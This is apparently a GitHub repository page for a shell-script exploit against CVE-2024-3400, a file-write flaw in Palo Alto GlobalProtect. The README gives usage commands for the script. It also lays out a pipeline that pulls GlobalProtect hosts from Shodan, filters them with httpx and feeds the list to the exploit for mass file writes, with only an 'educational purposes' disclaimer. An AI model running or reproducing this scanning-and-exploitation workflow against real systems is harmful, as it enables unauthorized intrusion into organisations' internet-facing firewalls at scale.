Skip to content

ak1t4/CVE-2024-3400

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2024-3400

CVE-2024-3400 Palo Alto File Write Exploit

This exploit search over Global Protect URLS instances & try to write-file using CVE-2024-3400

[ Use with Caution ]

[ Made with educational Purpouses only ]

Usage:

chmod +x gp-exploit.sh

./gp-exploit.sh file_name_to_write urls.txt

Test Image 4

Shodan Search & Url's filtering:

# shodan search --fields ip_str,port 'http.html:"Global Protect"' --separator ":" | sed 's/.$//' > gp.hosts
# httpx -l gp.hosts 
# ./gp-exploit file_name gp.hosts

Status Code Reponses Verification:

Test Image 5

About

Global Protec Palo Alto File Write Exploit

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages